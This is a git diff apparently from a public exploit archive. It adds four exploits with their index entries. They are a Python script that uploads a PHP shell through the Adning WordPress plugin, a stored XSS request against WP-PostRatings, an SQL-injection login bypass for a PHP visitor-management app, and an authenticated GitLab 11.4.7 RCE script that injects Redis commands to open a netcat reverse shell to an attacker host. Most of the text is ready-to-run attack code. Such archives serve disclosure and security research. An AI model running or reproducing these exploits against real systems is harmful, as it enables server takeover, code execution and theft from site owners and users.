diff --git a/exploits/php/webapps/49332.txt b/exploits/php/webapps/49332.txt new file mode 100644 index 000000000..e4a3701d1 --- /dev/null +++ b/exploits/php/webapps/49332.txt @@ -0,0 +1,73 @@ +# Exploit Title: WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload +# Google Dork: inurl:/wp-content/plugins/angwp +# Date: 23/12/2020 +# Exploit Author: spacehen +# Vendor Homepage: http://adning.com/ +# Version: <1.5.6 +# Tested on: Ubuntu 20.04.1 LTS (x86) + +import os.path +from os import path +import json +import requests; +import sys + +def print_banner(): + print("Adning Advertising < 1.5.6 - Arbitrary File Upload") + print("Author -> space_hen (www.lunar.sh)") + +def print_usage(): + print("Usage: python3 exploit.py [target url] [php file]") + print("Ex: python3 exploit.py https://example.com ./shell.php") + +def vuln_check(uri): + response = requests.get(uri) + raw = response.text + + if ("no files found" in raw): + return True; + else: + return False; + +def main(): + + print_banner() + if(len(sys.argv) != 3): + print_usage(); + sys.exit(1); + + base = sys.argv[1] + file_path = sys.argv[2] + + ajax_action = '_ning_upload_image' + admin = '/wp-admin/admin-ajax.php'; + + uri = base + admin + '?action=' + ajax_action ; + check = vuln_check(uri); + + if(check == False): + print("(*) Target not vulnerable!"); + sys.exit(1) + + if( path.isfile(file_path) == False): + print("(*) Invalid file!") + sys.exit(1) + + files = {'files[]' : open(file_path)} + data = { + "allowed_file_types" : "php,jpg,jpeg", + "upload" : json.dumps({"dir" : "../"}) + } + print("Uploading Shell..."); + response = requests.post(uri, files=files, data=data ) + file_name = path.basename(file_path) + if(file_name in response.text): + print("Shell Uploaded!") + if(base[-1] != '/'): + base += '/' + print(base + file_name) + else: + print("Shell Upload Failed") + sys.exit(1) + +main(); \ No newline at end of file diff --git a/exploits/php/webapps/49333.txt b/exploits/php/webapps/49333.txt new file mode 100644 index 000000000..9bf1992c6 --- /dev/null +++ b/exploits/php/webapps/49333.txt @@ -0,0 +1,41 @@ +# Exploit Title: WordPress Plugin WP-PostRatings 1.86 - 'postratings_image' Cross-Site Scripting +# Date: 20-12-2018 +# Software Link: https://wordpress.org/plugins/wp-postratings/ +# Exploit Author: Park Won Seok +# Version: wp-postratings.1.86 +# Tested on: Windows 10 x64 + +# description: +# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins wp-postratings.1.86 +# One parameters(postratings_image) have Cross-Site Scripting. + +# POC +# XSS Stored + +POST +http://localhost/wordpress/wp-admin/admin.php?page=wp-postratings/postratings-options.php + HTTP/1.1 +Host: localhost +Content-Length: 1765 +Cache-Control: max-age=0 +Origin: localhost +Upgrade-Insecure-Requests: 1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 +Referer: +http://localhost/wordpress/wp-admin/admin.php?page=wp-postratings%2Fpostratings-options.php +Accept-Encoding: gzip, deflate +Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: +wordpress_14f4416c910366e4d17f08fa58e71587=wordpress%7C1545577867%7CZwsmD4U29rPGA853ANHO1NUarjSBZi6ul0sDVvkKLwr%7Cff47715fb398e65023b74d3aad0d0429061e90422614399cf1cffb88df424173; +wp-settings-1=deleted; wp-settings-time-1=1545201993; +wordpress_test_cookie=WP+Cookie+check; +wordpress_logged_in_14f4416c910366e4d17f08fa58e71587=wordpress%7C1545577867%7CZwsmD4U29rPGA853ANHO1NUarjSBZi6ul0sDVvkKLwr%7Cd63f851c891cd0792c2c7e5a2d62342ffb57501777f1e8f0e9c13b8ff0daacc2 +Connection: close + +_wpnonce=b841885588&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fadmin.php%3Fpage%3Dwp-postratings%2Fpostratings-options.php&postratings_customrating=0&postratings_template_vote=%25RATINGS_IMAGES_VOTE%25+%28%3Cstrong%3E%25RATINGS_USERS%25%3C%2Fstrong%3E+votes%2C+average%3A+%3Cstrong%3E%25RATINGS_AVERAGE%25%3C%2Fstrong%3E+out+of+%25RATINGS_MAX%25%29%3Cbr+%2F%3E%25RATINGS_TEXT%25&postratings_template_text=%25RATINGS_IMAGES%25+%28%3Cem%3E%3Cstrong%3E%25RATINGS_USERS%25%3C%2Fstrong%3E+votes%2C+average%3A+%3Cstrong%3E%25RATINGS_AVERAGE%25%3C%2Fstrong%3E+out+of+%25RATINGS_MAX%25%2C+%3Cstrong%3Erated%3C%2Fstrong%3E%3C%2Fem%3E%29&postratings_template_permission=%25RATINGS_IMAGES%25+%28%3Cem%3E%3Cstrong%3E%25RATINGS_USERS%25%3C%2Fstrong%3E+votes%2C+average%3A+%3Cstrong%3E%25RATINGS_AVERAGE%25%3C%2Fstrong%3E+out+of+%25RATINGS_MAX%25%3C%2Fem%3E%29%3Cbr+%2F%3E%3Cem%3EYou+need+to+be+a+registered+member+to+rate+this.%3C%2Fem%3E&postratings_template_none=%25RATINGS_IMAGES_VOTE%25+%28No+Ratings+Yet%29%3Cbr+%2F%3E%25RATINGS_TEXT%25&postratings_template_highestrated=%3Cli%3E%3Ca+href%3D%22%25POST_URL%25%22+title%3D%22%25POST_TITLE%25%22%3E%25POST_TITLE%25%3C%2Fa%3E+%25RATINGS_IMAGES%25+%28%25RATINGS_AVERAGE%25+out+of+%25RATINGS_MAX%25%29%3C%2Fli%3E&postratings_template_mostrated=%3Cli%3E%3Ca+href%3D%22%25POST_URL%25%22++title%3D%22%25POST_TITLE%25%22%3E%25POST_TITLE%25%3C%2Fa%3E+-+%25RATINGS_USERS%25+votes%3C%2Fli%3E& +[postratings_image=stars\"onerror=alert(1) +--]&postratings_max=2&postratings_richsnippet=0&postratings_ratingstext%5B%5D=1+Star&postratings_ratingsvalue%5B%5D=%2B1&postratings_ratingstext%5B%5D=&postratings_ratingsvalue%5B%5D=0&postratings_ajax_style_loading=1&postratings_ajax_style_fading=1&postratings_allowtorate=2&postratings_logging_method=3&Submit=Save+Changes \ No newline at end of file diff --git a/exploits/php/webapps/49335.txt b/exploits/php/webapps/49335.txt new file mode 100644 index 000000000..38ee92886 --- /dev/null +++ b/exploits/php/webapps/49335.txt @@ -0,0 +1,14 @@ +# Exploit Title: Apartment Visitors Management System 1.0 - Authentication Bypass +# Date: 2020-12-24 +# Exploit Author: Kshitiz Raj(manitorpotterk) +# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/ +# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395 +# Version: V1.0 +# Tested on: Windows 10/Kali Linux + +Step 1 - Go to url http://localhost/avms/index.php +* + +Step 2 – Enter Username :- ' or '1'='1'# * + +Step 3 - Enter Password - anything* \ No newline at end of file diff --git a/exploits/ruby/webapps/49334.py b/exploits/ruby/webapps/49334.py new file mode 100755 index 000000000..3f89b1cd5 --- /dev/null +++ b/exploits/ruby/webapps/49334.py @@ -0,0 +1,101 @@ +# Exploit Title: GitLab 11.4.7 - RCE (Authenticated) +# Date: 24th December 2020 +# Exploit Author: Sam Redmond +# Software Link: https://gitlab.com/ +# Environment: GitLab 11.4.7, community edition +# CVE: CVE-2018-19571 + CVE-2018-19585 +# Version: 11.4.7 + +#!/usr/bin/python3 + +import requests +from bs4 import BeautifulSoup +import argparse +import random + + +parser = argparse.ArgumentParser(description='GitLab 11.4.7 RCE') +parser.add_argument('-u', help='GitLab Username/Email', required=True) +parser.add_argument('-p', help='Gitlab Password', required=True) +parser.add_argument('-g', help='Gitlab URL (without port)', required=True) +parser.add_argument('-l', help='reverse shell ip', required=True) +parser.add_argument('-P', help='reverse shell port', required=True) +args = parser.parse_args() + +username = args.u +password = args.p +gitlab_url = args.g + ":5080" +local_ip = args.l +local_port = args.p + +session = requests.Session() + +# Get Authentication Token +r = session.get(gitlab_url + "/users/sign_in") +soup = BeautifulSoup(r.text, features="lxml") +token = soup.findAll('meta')[16].get("content") +print(f"[+] authenticity_token: {token}") + +login_form = { + "authenticity_token": token, + "user[login]": username, + "user[password]": password, + "user[remember_me]": "0" +} +r = session.post(f"{gitlab_url}/users/sign_in", data=login_form) + +if r.status_code != 200: + exit(f"Login Failed:{r.text}") + +# Create project +import_url = "git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2F.git" +project_name = f'project{random.randrange(1, 10000)}' +project_url = f'{gitlab_url}/{username}' + +print(f"[+] Creating project with random name: {project_name}") + +form = """\nmulti + sadd resque:gitlab:queues system_hook_push + lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'nc {local_ip} {local_port}' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}" + exec + exec + exec\n""" + +r = session.get(f"{gitlab_url}/projects/new") +soup = BeautifulSoup(r.text, features="lxml") + +namespace_id = soup.find( + 'input', {'name': 'project[namespace_id]'}).get('value') + +project_token = soup.findAll('meta')[16].get("content") +project_token = project_token.replace("==", "%3D%3D") +project_token = project_token.replace("+", "%2B") + +payload = f"utf8=%E2%9C%93&authenticity_token={project_token}&project%5Bimport_url%5D={import_url}{form}&project%5Bci_cd_only%5D=false&project%5Bname%5D={project_name}&project%5Bnamespace_id%5D={namespace_id}&project%5Bpath%5D={project_name}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0" + +cookies = { + 'sidebar_collapsed': 'false', + 'event_filter': 'all', + 'hide_auto_devops_implicitly_enabled_banner_1': 'false', + '_gitlab_session': session.cookies['_gitlab_session'], +} + +headers = { + 'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Accept-Language': 'en-US,en;q=0.5', + 'Accept-Encoding': 'gzip, deflate', + 'Referer': f'{gitlab_url}/projects', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Content-Length': '398', + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1', +} + +print("[+] Running Exploit") +r = session.post( + gitlab_url+'/projects', data=payload, cookies=cookies, headers=headers, verify=False) +if "The change you requested was rejected." in r.text: + exit('Exploit failed, check input params') + +print('[+] Exploit completed successfully!') \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index dfccd4523..b2d631ec3 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -43529,6 +43529,7 @@ id,file,description,date,author,type,platform,port 49312,exploits/php/webapps/49312.txt,"Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)",2020-12-22,"Matthew Aberegg",webapps,php, 49314,exploits/php/webapps/49314.txt,"CSE Bookstore 1.0 - Multiple SQL Injection",2020-12-22,"Musyoka Ian",webapps,php, 49315,exploits/php/webapps/49315.txt,"Library Management System 3.0 - _Add Category_ Stored XSS",2020-12-22,"Kislay Kumar",webapps,php, +49335,exploits/php/webapps/49335.txt,"Apartment Visitors Management System 1.0 - Authentication Bypass",2020-12-24,"Kshitiz Raj",webapps,php, 49316,exploits/php/webapps/49316.txt,"Multi Branch School Management System 3.5 - _Create Branch_ Stored XSS",2020-12-22,"Kislay Kumar",webapps,php, 49317,exploits/php/webapps/49317.rb,"WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit)",2020-12-22,"SunCSR Team",webapps,php, 49318,exploits/linux/webapps/49318.rb,"Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit)",2020-12-22,AkkuS,webapps,linux, @@ -43543,3 +43544,6 @@ id,file,description,date,author,type,platform,port 49329,exploits/php/webapps/49329.txt,"Sales and Inventory System for Grocery Store 1.0 - Multiple Stored XSS",2020-12-23,"Vijay Sachdeva",webapps,php, 49330,exploits/linux/webapps/49330.rb,"TerraMaster TOS 4.2.06 - Unauthenticated Remote Code Execution (Metasploit)",2020-12-23,AkkuS,webapps,linux, 49331,exploits/php/webapps/49331.txt,"Baby Care System 1.0 - 'roleid' SQL Injection",2020-12-23,"Vijay Sachdeva",webapps,php, +49332,exploits/php/webapps/49332.txt,"WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload",2020-12-24,spacehen,webapps,php, +49333,exploits/php/webapps/49333.txt,"WordPress Plugin WP-PostRatings 1.86 - 'postratings_image' Cross-Site Scripting",2020-12-24,"Park Won Seok",webapps,php, +49334,exploits/ruby/webapps/49334.py,"GitLab 11.4.7 - RCE (Authenticated)",2020-12-24,"Sam Redmond",webapps,ruby,